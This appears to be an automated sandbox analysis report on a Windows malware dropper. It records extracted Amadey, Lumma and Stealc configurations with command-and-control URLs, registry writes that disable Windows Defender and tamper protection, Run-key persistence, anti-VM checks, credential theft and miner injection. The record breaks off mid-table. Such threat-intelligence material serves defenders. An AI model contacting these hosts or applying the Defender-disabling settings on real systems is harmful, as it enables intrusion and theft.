Analysis
-
max time kernel
141s -
max time network
148s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
13-12-2024 00:06
Static task
static1
General
-
Target
9e3021c747f1c9b9bdd32194b75fdc724c7b8ab81af26dafcec2febef9f4b229.exe
-
Size
3.1MB
-
MD5
ca0f8493d787c9f2d97d00c245143f41
-
SHA1
6ebb479b6c871e48ab97d2784b9e61fd2da1b55b
-
SHA256
9e3021c747f1c9b9bdd32194b75fdc724c7b8ab81af26dafcec2febef9f4b229
-
SHA512
74999928fc8a11b4963180e2647d93dad68d5f25388a1dde4e9aed94bf3e3cbca9710275ebfc0c468c9071c0f4f0302f73bfcf5c65d1b1334520ac68fed21fc3
-
SSDEEP
98304:XRN/TBqe65AG4sj49ezlNOYO+sR93Q1u7kW:X3B0oz+sRRQ1D
Malware Config
Extracted
amadey
4.42
9c9aa5
http://185.215.113.43
-
install_dir
abc3bc1985
-
install_file
skotes.exe
-
strings_key
8a35cf2ea38c2817dba29a4b5b25dcf0
-
url_paths
/Zu7JuNko/index.php
Extracted
lumma
https://impend-differ.biz/api
https://print-vexer.biz/api
https://dare-curbys.biz/api
https://covery-mover.biz/api
https://formy-spill.biz/api
https://dwell-exclaim.biz/api
https://zinc-sneark.biz/api
https://se-blurry.biz/api
https://drive-connect.cyou/api
Extracted
stealc
stok
http://185.215.113.206
-
url_path
/c4becf79229cb002.php
Extracted
lumma
https://drive-connect.cyou/api
https://covery-mover.biz/api
Signatures
-
Amadey family
-
Gcleaner family
-
Lumma family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" 7b581c1e44.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" 7b581c1e44.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" 7b581c1e44.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" 7b581c1e44.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" 7b581c1e44.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection 7b581c1e44.exe -
Stealc family
-
Xmrig family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 5 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 9e3021c747f1c9b9bdd32194b75fdc724c7b8ab81af26dafcec2febef9f4b229.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 1206054524.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 7b581c1e44.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 777b33ea97.exe -
XMRig Miner payload 10 IoCs
resource yara_rule behavioral1/memory/3284-771-0x0000000140000000-0x0000000140770000-memory.dmp xmrig behavioral1/memory/3284-772-0x0000000140000000-0x0000000140770000-memory.dmp xmrig behavioral1/memory/3284-773-0x0000000140000000-0x0000000140770000-memory.dmp xmrig behavioral1/memory/3284-774-0x0000000140000000-0x0000000140770000-memory.dmp xmrig behavioral1/memory/3284-775-0x0000000140000000-0x0000000140770000-memory.dmp xmrig behavioral1/memory/3284-776-0x0000000140000000-0x0000000140770000-memory.dmp xmrig behavioral1/memory/3284-777-0x0000000140000000-0x0000000140770000-memory.dmp xmrig behavioral1/memory/3284-796-0x0000000140000000-0x0000000140770000-memory.dmp xmrig behavioral1/memory/3284-798-0x0000000140000000-0x0000000140770000-memory.dmp xmrig behavioral1/memory/3284-799-0x0000000140000000-0x0000000140770000-memory.dmp xmrig -
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 10 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 1206054524.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 7b581c1e44.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 7b581c1e44.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 777b33ea97.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 777b33ea97.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 9e3021c747f1c9b9bdd32194b75fdc724c7b8ab81af26dafcec2febef9f4b229.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 9e3021c747f1c9b9bdd32194b75fdc724c7b8ab81af26dafcec2febef9f4b229.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 1206054524.exe -
Executes dropped EXE 22 IoCs
pid Process 2872 skotes.exe 2060 9JTVo50.exe 1484 ccb835542e.exe 2188 7z.exe 2068 7z.exe 1984 7z.exe 1920 7z.exe 840 7z.exe 1868 45c3c2bb5b.exe 2528 7z.exe 1804 7z.exe 3068 7z.exe 1656 in.exe 688 45c3c2bb5b.exe 2792 4b025ca5ea.exe 1380 2ccaab4f2b.exe 2348 fb7039a8b8.exe 2440 1206054524.exe 2888 7b581c1e44.exe 3372 777b33ea97.exe 1584 Intel_PTT_EK_Recertification.exe 3972 Intel_PTT_EK_Recertification.exe -
Identifies Wine through registry keys 2 TTPs 5 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Wine 777b33ea97.exe Key opened \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Wine 9e3021c747f1c9b9bdd32194b75fdc724c7b8ab81af26dafcec2febef9f4b229.exe Key opened \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Wine 1206054524.exe Key opened \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Wine 7b581c1e44.exe -
Loads dropped DLL 43 IoCs
pid Process 2212 9e3021c747f1c9b9bdd32194b75fdc724c7b8ab81af26dafcec2febef9f4b229.exe 2872 skotes.exe 2872 skotes.exe 1936 cmd.exe 2188 7z.exe 1936 cmd.exe 2068 7z.exe 1936 cmd.exe 1984 7z.exe 1936 cmd.exe 1920 7z.exe 1936 cmd.exe 2872 skotes.exe 2872 skotes.exe 840 7z.exe 1936 cmd.exe 2528 7z.exe 1936 cmd.exe 1804 7z.exe 1936 cmd.exe 3068 7z.exe 1936 cmd.exe 1936 cmd.exe 1868 45c3c2bb5b.exe 2872 skotes.exe 2872 skotes.exe 2872 skotes.exe 2872 skotes.exe 2796 WerFault.exe 2796 WerFault.exe 2796 WerFault.exe 2796 WerFault.exe 2796 WerFault.exe 2872 skotes.exe 2872 skotes.exe 2872 skotes.exe 2872 skotes.exe 2872 skotes.exe 2872 skotes.exe 3248 taskeng.exe 3248 taskeng.exe 3372 777b33ea97.exe 3248 taskeng.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features 7b581c1e44.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 7b581c1e44.exe -
Adds Run key to start application 2 TTPs 3 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Run\fb7039a8b8.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1014573001\\fb7039a8b8.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Run\1206054524.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1014574001\\1206054524.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Run\7b581c1e44.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1014575001\\7b581c1e44.exe" skotes.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x001100000001961d-425.dat autoit_exe -
Drops file in System32 directory 2 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs
pid Process 2212 9e3021c747f1c9b9bdd32194b75fdc724c7b8ab81af26dafcec2febef9f4b229.exe 2872 skotes.exe 2440 1206054524.exe 2888 7b581c1e44.exe 3372 777b33ea97.exe -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 1868 set thread context of 688 1868 45c3c2bb5b.exe 55 PID 1584 set thread context of 3284 1584 Intel_PTT_EK_Recertification.exe 93 PID 3972 set thread context of 3996 3972 Intel_PTT_EK_Recertification.exe 99 -
resource yara_rule behavioral1/files/0x0005000000019613-155.dat upx behavioral1/memory/1656-162-0x000000013F7F0000-0x000000013FC80000-memory.dmp upx behavioral1/memory/1584-769-0x000000013F090000-0x000000013F520000-memory.dmp upx behavioral1/memory/1584-780-0x000000013F090000-0x000000013F520000-memory.dmp upx behavioral1/memory/3972-833-0x000000013FC10000-0x00000001400A0000-memory.dmp upx behavioral1/memory/3972-847-0x000000013FC10000-0x00000001400A0000-memory.dmp upx -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\Tasks\skotes.job 9e3021c747f1c9b9bdd32194b75fdc724c7b8ab81af26dafcec2febef9f4b229.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 2796 2060 WerFault.exe 32 -
System Location Discovery: System Language Discovery 1 TTPs 21 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 4b025ca5ea.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language fb7039a8b8.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7b581c1e44.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 45c3c2bb5b.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language fb7039a8b8.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 9JTVo50.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 9e3021c747f1c9b9bdd32194b75fdc724c7b8ab81af26dafcec2febef9f4b229.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 45c3c2bb5b.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage fb7039a8b8.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1206054524.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language skotes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ccb835542e.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2ccaab4f2b.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 777b33ea97.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 6 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 2384 PING.EXE 3320 powershell.exe 3048 PING.EXE 4056 powershell.exe 3764 PING.EXE 1816 powershell.exe -
Checks processor information in registry 2 TTPs 8 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 4b025ca5ea.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\CurrentPatchLevel firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 4b025ca5ea.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 2820 timeout.exe -
Kills process with taskkill 5 IoCs
pid Process 2644 taskkill.exe 1680 taskkill.exe 2776 taskkill.exe 2980 taskkill.exe 1264 taskkill.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_Classes\Local Settings firefox.exe -
description ioc Process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a 4b025ca5ea.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a 4b025ca5ea.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 45c3c2bb5b.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25190000000100000010000000ba4f3972e7aed9dccdc210db59da13c92000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a 45c3c2bb5b.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 4b025ca5ea.exe -
Runs ping.exe 1 TTPs 3 IoCs
pid Process 2384 PING.EXE 3048 PING.EXE 3764 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1784 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 17 IoCs
pid Process 2212 9e3021c747f1c9b9bdd32194b75fdc724c7b8ab81af26dafcec2febef9f4b229.exe 2872 skotes.exe 1816 powershell.exe 2792 4b025ca5ea.exe 2440 1206054524.exe 2348 fb7039a8b8.exe 2348 fb7039a8b8.exe 2888 7b581c1e44.exe 2888 7b581c1e44.exe 2888 7b581c1e44.exe 2888 7b581c1e44.exe 3372 777b33ea97.exe 3372 777b33ea97.exe 1584 Intel_PTT_EK_Recertification.exe 3320 powershell.exe 3972 Intel_PTT_EK_Recertification.exe 4056 powershell.exe -
Suspicious use of AdjustPrivilegeToken 45 IoCs
description pid Process Token: SeRestorePrivilege 2188 7z.exe Token: 35 2188 7z.exe Token: SeSecurityPrivilege 2188 7z.exe Token: SeSecurityPrivilege 2188 7z.exe Token: SeRestorePrivilege 2068 7z.exe Token: 35 2068 7z.exe Token: SeSecurityPrivilege 2068 7z.exe Token: SeSecurityPrivilege 2068 7z.exe Token: SeRestorePrivilege 1984 7z.exe Token: 35 1984 7z.exe Token: SeSecurityPrivilege 1984 7z.exe Token: SeSecurityPrivilege 1984 7z.exe Token: SeRestorePrivilege 1920 7z.exe Token: 35 1920 7z.exe Token: SeSecurityPrivilege 1920 7z.exe Token: SeSecurityPrivilege 1920 7z.exe Token: SeRestorePrivilege 840 7z.exe Token: 35 840 7z.exe Token: SeSecurityPrivilege 840 7z.exe Token: SeSecurityPrivilege 840 7z.exe Token: SeRestorePrivilege 2528 7z.exe Token: 35 2528 7z.exe Token: SeSecurityPrivilege 2528 7z.exe Token: SeSecurityPrivilege 2528 7z.exe Token: SeRestorePrivilege 1804 7z.exe Token: 35 1804 7z.exe Token: SeSecurityPrivilege 1804 7z.exe Token: SeSecurityPrivilege 1804 7z.exe Token: SeRestorePrivilege 3068 7z.exe Token: 35 3068 7z.exe Token: SeSecurityPrivilege 3068 7z.exe Token: SeSecurityPrivilege 3068 7z.exe Token: SeDebugPrivilege 1816 powershell.exe Token: SeDebugPrivilege 2644 taskkill.exe Token: SeDebugPrivilege 1680 taskkill.exe Token: SeDebugPrivilege 2776 taskkill.exe Token: SeDebugPrivilege 2980 taskkill.exe Token: SeDebugPrivilege 1264 taskkill.exe Token: SeDebugPrivilege 1860 firefox.exe Token: SeDebugPrivilege 1860 firefox.exe Token: SeDebugPrivilege 2888 7b581c1e44.exe Token: SeDebugPrivilege 3320 powershell.exe Token: SeLockMemoryPrivilege 3284 explorer.exe Token: SeLockMemoryPrivilege 3996 explorer.exe Token: SeDebugPrivilege 4056 powershell.exe -
Suspicious use of FindShellTrayWindow 16 IoCs
pid Process 2212 9e3021c747f1c9b9bdd32194b75fdc724c7b8ab81af26dafcec2febef9f4b229.exe 2348 fb7039a8b8.exe 2348 fb7039a8b8.exe 2348 fb7039a8b8.exe 2348 fb7039a8b8.exe 2348 fb7039a8b8.exe 2348 fb7039a8b8.exe 2348 fb7039a8b8.exe 2348 fb7039a8b8.exe 1860 firefox.exe 1860 firefox.exe 1860 firefox.exe 1860 firefox.exe 2348 fb7039a8b8.exe 2348 fb7039a8b8.exe 2348 fb7039a8b8.exe -
Suspicious use of SendNotifyMessage 14 IoCs
pid Process 2348 fb7039a8b8.exe 2348 fb7039a8b8.exe 2348 fb7039a8b8.exe 2348 fb7039a8b8.exe 2348 fb7039a8b8.exe 2348 fb7039a8b8.exe 2348 fb7039a8b8.exe 2348 fb7039a8b8.exe 1860 firefox.exe 1860 firefox.exe 1860 firefox.exe 2348 fb7039a8b8.exe 2348 fb7039a8b8.exe 2348 fb7039a8b8.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2212 wrote to memory of 2872 2212 9e3021c747f1c9b9bdd32194b75fdc724c7b8ab81af26dafcec2febef9f4b229.exe 30 PID 2212 wrote to memory of 2872 2212 9e3021c747f1c9b9bdd32194b75fdc724c7b8ab81af26dafcec2febef9f4b229.exe 30 PID 2212 wrote to memory of 2872 2212 9e3021c747f1c9b9bdd32194b75fdc724c7b8ab81af26dafcec2febef9f4b229.exe 30 PID 2212 wrote to memory of 2872 2212 9e3021c747f1c9b9bdd32194b75fdc724c7b8ab81af26dafcec2febef9f4b229.exe 30 PID 2872 wrote to memory of 2060 2872 skotes.exe 32 PID 2872 wrote to memory of 2060 2872 skotes.exe 32 PID 2872 wrote to memory of 2060 2872 skotes.exe 32 PID 2872 wrote to memory of 2060 2872 skotes.exe 32 PID 2872 wrote to memory of 1484 2872 skotes.exe 33 PID 2872 wrote to memory of 1484 2872 skotes.exe 33 PID 2872 wrote to memory of 1484 2872 skotes.exe 33 PID 2872 wrote to memory of 1484 2872 skotes.exe 33 PID 1484 wrote to memory of 1936 1484 ccb835542e.exe 34 PID 1484 wrote to memory of 1936 1484 ccb835542e.exe 34 PID 1484 wrote to memory of 1936 1484 ccb835542e.exe 34 PID 1484 wrote to memory of 1936 1484 ccb835542e.exe 34 PID 1936 wrote to memory of 3064 1936 cmd.exe 36 PID 1936 wrote to memory of 3064 1936 cmd.exe 36 PID 1936 wrote to memory of 3064 1936 cmd.exe 36 PID 1936 wrote to memory of 2188 1936 cmd.exe 37 PID 1936 wrote to memory of 2188 1936 cmd.exe 37 PID 1936 wrote to memory of 2188 1936 cmd.exe 37 PID 1936 wrote to memory of 2068 1936 cmd.exe 38 PID 1936 